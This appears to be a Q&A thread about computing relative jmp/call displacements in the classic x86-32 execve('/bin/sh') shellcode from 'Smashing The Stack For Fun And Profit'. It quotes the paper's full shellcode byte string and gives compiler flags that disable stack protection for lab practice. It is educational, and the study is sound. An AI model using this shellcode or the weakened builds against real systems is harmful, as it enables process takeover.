How to manually calculate jump offsets in Intel x86-32? How are instructions fetched in x86: one instruction at a time, or in chunks of 4 bytes?

Question

I was going through the paper Smashing The Stack For Fun And Profit. It has a section of assembly code where the offsets for the jmp and call instructions, which are relative to the program counter, have to be calculated manually.

        jmp    offset-to-call               # 2 bytes   -----         
        popl   %esi                         # 1 byte         |      <----------
        movl   %esi,array-offset(%esi)      # 3 bytes        |                |
        movb   $0x0,nullbyteoffset(%esi)    # 4 bytes        |                |
        movl   $0x0,null-offset(%esi)       # 7 bytes        |                |
        movl   $0xb,%eax                    # 5 bytes        |                |
        movl   %esi,%ebx                    # 2 bytes        |                |
        leal   array-offset,(%esi),%ecx     # 3 bytes        |                |
        leal   null-offset(%esi),%edx       # 3 bytes        |                |
        int    $0x80                        # 2 bytes        |                |
        movl   $0x1, %eax                   # 5 bytes        |                |
        movl   $0x0, %ebx                   # 5 bytes        |                |
        int    $0x80                        # 2 bytes        |                |
        call   offset-to-popl               # 5 bytes <-------       ----------
        /bin/sh string goes here.

The above is the rough sketch of the assembly the author wants to achieve.

Then the author plugs in the actual offsets as follows:

        jmp    0x26                     # 2 bytes
        popl   %esi                     # 1 byte
        movl   %esi,0x8(%esi)           # 3 bytes
        movb   $0x0,0x7(%esi)           # 4 bytes
        movl   $0x0,0xc(%esi)           # 7 bytes
        movl   $0xb,%eax                # 5 bytes
        movl   %esi,%ebx                # 2 bytes
        leal   0x8(%esi),%ecx           # 3 bytes
        leal   0xc(%esi),%edx           # 3 bytes
        int    $0x80                    # 2 bytes
        movl   $0x1, %eax               # 5 bytes
        movl   $0x0, %ebx               # 5 bytes
        int    $0x80                    # 2 bytes
        call   -0x2b                    # 5 bytes
        .string "/bin/sh"               # 8 bytes

I have basic knowledge of how instruction fetch works, mainly from experience with MIPS32 assembly. There, all instructions have a fixed length (4 bytes) and are fetched in chunks of 4 bytes. For a jump instruction there, we calculate the offset to the branch target as follows:

Suppose the target of a (relative) branch is at an address x, which is word aligned (assuming a word length of 4 bytes), and our jump instruction is at address y. The offset is the value that gives the target when added to the current PC (program counter). When the instruction at address y is fetched, the PC is y+4, so the offset to the target address is x-y-4.
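The rule in the paragraph above can be written as a one-line function. This is only a sketch of the byte-level arithmetic as described here: the addresses are made-up values for illustration, the function name is hypothetical, and the detail that real MIPS encodings store the branch offset as a word count is left out.

```python
def mips_style_offset(target: int, branch_addr: int, insn_len: int = 4) -> int:
    """Offset = target minus the PC value after the branch has been fetched."""
    pc_after_fetch = branch_addr + insn_len  # PC is y + 4 once y is fetched
    return target - pc_after_fetch           # x - y - 4


# Hypothetical addresses, chosen only for illustration.
y = 0x1000  # address of the branch instruction
x = 0x1020  # word-aligned branch target
print(mips_style_offset(x, y))  # 28, i.e. x - y - 4
```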

Now if I apply the same reasoning here, assuming instructions are fetched at instruction granularity (i.e. not in chunks of 4 bytes but according to the size of each instruction), then once the jmp instruction has been fetched, the PC (eip) points to the popl instruction. On that basis, the offset to the call instruction should have been 1+3+4+7+5+2+3+3+2+5+5+2 = 42 = 0x2a (and not 38 = 0x26). So evidently that is not how the paper computed it.

Using the same approach for the call instruction, I get an offset of -(5+2+5+5+2+3+3+2+5+7+4+3+1) = -47 = -0x2f.
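Both sums can be cross-checked mechanically. The following is a minimal sketch, assuming the byte lengths given in the listing's comments are right and that each displacement is measured from the end of the jmp or call (the address of the next instruction). The helper names are illustrative, not from the paper.

```python
# (instruction, length in bytes); lengths are taken from the listing's comments.
LISTING = [
    ("jmp    <call>", 2),
    ("popl   %esi", 1),
    ("movl   %esi,0x8(%esi)", 3),
    ("movb   $0x0,0x7(%esi)", 4),
    ("movl   $0x0,0xc(%esi)", 7),
    ("movl   $0xb,%eax", 5),
    ("movl   %esi,%ebx", 2),
    ("leal   0x8(%esi),%ecx", 3),
    ("leal   0xc(%esi),%edx", 3),
    ("int    $0x80", 2),
    ("movl   $0x1,%eax", 5),
    ("movl   $0x0,%ebx", 5),
    ("int    $0x80", 2),
    ("call   <popl>", 5),
]
JMP, POPL, CALL = 0, 1, 13  # indices into LISTING


def start_offsets(listing):
    """Byte offset of the first byte of each instruction."""
    offsets, pos = [], 0
    for _, length in listing:
        offsets.append(pos)
        pos += length
    return offsets


def rel_displacement(listing, src_index, dst_index):
    """Displacement from the end of instruction src to the start of dst."""
    starts = start_offsets(listing)
    next_insn = starts[src_index] + listing[src_index][1]
    return starts[dst_index] - next_insn


print(hex(rel_displacement(LISTING, JMP, CALL)))   # 0x2a
print(hex(rel_displacement(LISTING, CALL, POPL)))  # -0x2f
```

Keeping the lengths in a table means any later change to an instruction only needs one entry updated, rather than redoing both sums by hand.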

Working backwards from the paper's values, I found that the jmp offset appears to be calculated as if the PC (eip) points to the start of movb after the jmp is fetched.

Likewise, the offset for call appears to be calculated as if the PC (eip) points to the start of the call instruction.

Can anyone please help me understand how these manual calculations are done?

In real CPUs, instructions are fetched 16 or 32 bytes at a time, or from the uop cache in groups of up to 6 uops (https://www.realworldtech.com/sandy-bridge/3/). But the machine behaves as-if instructions were fetched 1 at a time, and [Observing stale instruction fetching on x86 with self-modifying code](https://stackoverflow.com/q/17395557) is not possible so I-fetch details have pretty much zero effect on correctness, only performance. Decoding knows where each instruction ended; that's the reference point for relative calls and x86-64 RIP-relative addressing. — Peter Cordes, Aug 07 '22 at 08:00
This design decision was made for 8086, though, which fetched bytes 2 at a time (or 1 at a time for 8088) into a prefetch buffer, and decoded iteratively through the byte stream, not at all like a pipelined design like MIPS. [Why do call and jump instruction use a displacement relative to the next instruction, not current?](https://stackoverflow.com/q/58720936) explains the design decision in those terms. — Peter Cordes, Aug 07 '22 at 08:08
Your method of calculating the offsets is correct, and the values shown in your source are simply incorrect. Probably the code was changed after originally computing the offsets and they weren't updated, which is the biggest hazard of trying to do such things by hand. — prl, Aug 07 '22 at 08:18
You did get the wrong offset for the call instruction, though, because its destination should be the popl and not the jmp instruction. — prl, Aug 07 '22 at 08:19
Yup, on more careful reading of the question, I was just about to say the same thing as @prl. I actually checked with GAS assembling that code (with the jmp/call targets replaced with labels), and the jmp is encoded as `eb 2a jmp`. (https://godbolt.org/z/953MKsP8c has the source with the right target for the call. I fixed that in your diagram assuming that was just an ASCII art mistake, not a misunderstanding of the jmp/call/pop shellcode idiom to get an address into a register in a PC-relative way. Like using MIPS `bal rel16` to set `$ra` to point at some data that followed it.) — Peter Cordes, Aug 07 '22 at 08:23
@prl Thank you for the help. Yes, it was an error on my part. Being unable to get the logic behind the calculation was bugging me so much that while making the ASCII art, I extended the `call` arrow to the `jmp` instead of the `popl` instruction. And looking at that diagram, I calculated the offset wrongly (I had an extra 2 bytes in it). I have fixed it now. — Abhishek Ghosh, Aug 07 '22 at 09:20
@PeterCordes Thanks for the online tool, which practically verified my calculations... — Abhishek Ghosh, Aug 07 '22 at 09:27
@PeterCordes, I also verified the `-0x2f` offset in the `call` instruction. Assuming `rel32`, `-0x2f` gets converted to `0x ff ff ff d1` in 2's complement. In the little-endian system, it is reflected as `d1 ff ff ff` in the instruction. — Abhishek Ghosh, Aug 07 '22 at 09:46
https://godbolt.org/ just uses gcc or clang to compile or assemble, and `objdump -d` to disassemble into a listing. You can do the same thing locally with `gcc -c foo.S` / `objdump -drwC -Mintel foo.o`. But yeah it's quite handy for linking to other people, and very good for playing around with how C or other high-level languages compile to asm. — Peter Cordes, Aug 07 '22 at 09:50
And yeah, relative call is only available in a rel32 form, so small displacements always have to get sign-extended to 32-bit. — Peter Cordes, Aug 07 '22 at 09:52
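The two's-complement and little-endian steps discussed in the comments above can be reproduced with Python's `struct` module. This is a sketch for checking the arithmetic, not a general assembler: the helper names are made up, and `0xe8` is the opcode byte of the `call rel32` form (the same byte that starts the `call` in the paper's final shellcode string).

```python
import struct


def encode_rel32(displacement: int) -> bytes:
    """Pack a signed 32-bit displacement as 4 little-endian bytes."""
    return struct.pack("<i", displacement)


def encode_call_rel32(displacement: int) -> bytes:
    """Opcode byte 0xe8 followed by the rel32 displacement."""
    return b"\xe8" + encode_rel32(displacement)


print(encode_rel32(-0x2f).hex(" "))       # d1 ff ff ff
print(encode_call_rel32(-0x2f).hex(" "))  # e8 d1 ff ff ff
```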
@PeterCordes can you give me suggestions regarding where I can successfully execute the binaries generated? Because my Lubuntu 22.04 OS detects the stack smashing and aborts the process. I am a master's student and would like to learn the concepts through hands-on experience. — Abhishek Ghosh, Aug 08 '22 at 11:36
Some modern distros configure GCC with `-fstack-protector-strong` on by default. Use `-fno-stack-protector -zexecstack` to make executables vulnerable to old-school code injection. Keep in mind that non-executable stacks are very widely used in real life, but a simple code-injection attack is still useful to understand as a building block for understanding other forms of doing stuff in a target process, like ROP attacks. — Peter Cordes, Aug 08 '22 at 11:42
The paper (Smashing the stack for fun and profit) generates a hexadecimal format of the shellcode which the author wrote. He says that he did that using GDB. We require that to be fed into a buffer (character array). I do not know how to generate that kind of output from the a.out file using GDB. Please can you guide me? A tutorial which shows how to achieve that... `"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh";` I meant this string — Abhishek Ghosh, Aug 17 '22 at 14:26
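One way to get a string in that `\x..` form, sketched under assumptions: this is not the GDB procedure the paper used. It assumes the raw machine-code bytes have already been obtained some other way, for example by copying them from the byte column of an `objdump -d` listing. The function name is hypothetical.

```python
def to_c_escapes(code: bytes) -> str:
    """Format raw bytes as \\xNN escapes suitable for a C string literal."""
    return "".join(f"\\x{b:02x}" for b in code)


# First six bytes of the string quoted above, used here only as sample input.
sample = bytes.fromhex("eb1f5e897608")
print(to_c_escapes(sample))  # \xeb\x1f\x5e\x89\x76\x08
```

The printable tail (`/bin/sh`) can be appended to the literal as plain text, as the quoted string does.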

0 Answers